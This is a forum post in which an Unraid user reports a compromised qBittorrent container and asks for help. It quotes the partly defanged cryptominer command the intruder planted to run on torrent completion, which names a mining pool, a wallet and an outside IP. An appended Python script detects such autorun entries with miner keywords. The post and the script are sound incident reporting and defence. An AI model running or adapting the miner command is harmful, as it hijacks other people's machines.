Docker container compromised - Unraid affected?


[Attachment: tower-diagnostics-20210830-1839.zip]

I was away from home last night, and when I came back from work today, I noticed that my CPU was nearly maxed out. This was odd, but does happen sometimes. However, I went into my torrent client (qbittorrent), and found that all of my torrents had been deleted and had been replaced with a single torrent for some kind of Italian music.

[Image: qbt1.png]

 

It should go without saying that I have never heard of this music nor did I seek it out. I went into my logs for qbt, and found the following:

[Images: qbt1.png, qbt2.png]

 

I have no idea what those ports I circled are; I have never used them to my knowledge. I also found in my settings that some code was marked to be executed upon completion of the torrent:

/tmp/x -o pool.suppo[CODE NEUTER]rtxmr.com:443 -u 8C2GLAN7wPEDE7xAiCLYBwdPtjc3B5pWH[CODE NEUTER]44989qMTmwSjbKmm2Y1Zog9UJWchsnrkjF4qkr7CbCtUAS4QGWyxhRW7Vfg5RZ -k --tls -o 107.173.34.104:9090

The [CODE NEUTER]s were added by me to prevent any accidental activation.

 

Furthermore, the logs Unraid gives me for qbt show this:

[Image: qbt3.png]

 

All in all, I take this to mean that someone hijacked my system to run some kind of mining software. I can see in the logs here that the line of code to be run on completion was changed a few times; I assume this was the hacker setting up their system.

 

I've already done what I can to stop any further access and stop any illicit activity, but I'm worried about making sure there isn't any lasting damage or compromise. I am not very well versed with this stuff, so I would appreciate any suggestions.

 

I have attached my diag file.

https://forums.unraid.net/applications/core/interface/file/attachment.php?id=125259&key=7d5b734ea2581f6305efd6e1c07edb66

Edited by brainyyak
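
An added example, not part of the original post and not Unraid or qBittorrent project code: a small audit of a qBittorrent configuration for the kind of "run on completion" entry the post describes. It assumes the setting is stored in qBittorrent.conf under `[AutoRun]` as `enabled=` / `program=`; the sample config, host name and wallet string are constructed placeholders.

```python
import configparser
import re
import shlex

# Constructed sample config, not the poster's file. Host and wallet are placeholders.
# Assumption: qBittorrent keeps the "run external program" setting in
# qBittorrent.conf under [AutoRun] as enabled= / program=.
SAMPLE_CONF = """\
[AutoRun]
enabled=true
program=/tmp/x -o pool.example.invalid:443 -u WALLET_PLACEHOLDER -k --tls

[Preferences]
General\\Locale=en
"""

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
HOST_PORT = re.compile(r"^[A-Za-z0-9.-]+:\d{1,5}$")
MINER_HINTS = ("xmr", "monero", "stratum", "pool.")


def audit_autorun(conf_text):
    """Return human-readable findings for the [AutoRun] program, or []."""
    cp = configparser.RawConfigParser(delimiters=("=",), strict=False)
    cp.optionxform = str  # keep qBittorrent's key case
    cp.read_string(conf_text)
    program = cp.get("AutoRun", "program", fallback="").strip()
    if not program:
        return []
    try:
        argv = shlex.split(program)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = program.split()
    findings = []
    if cp.get("AutoRun", "enabled", fallback="false").lower() == "true":
        findings.append("autorun enabled: " + program)
    if argv[0].startswith(TEMP_DIRS):
        findings.append("executable in temp directory: " + argv[0])
    for arg in argv[1:]:
        if HOST_PORT.match(arg):
            findings.append("network endpoint argument: " + arg)
        if any(h in arg.lower() for h in MINER_HINTS):
            findings.append("miner-related keyword in argument: " + arg)
    return findings


if __name__ == "__main__":
    for line in audit_autorun(SAMPLE_CONF):
        print(line)
```

An empty result only means these heuristics did not fire; any autorun program that was not set by the owner deserves a closer look regardless.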
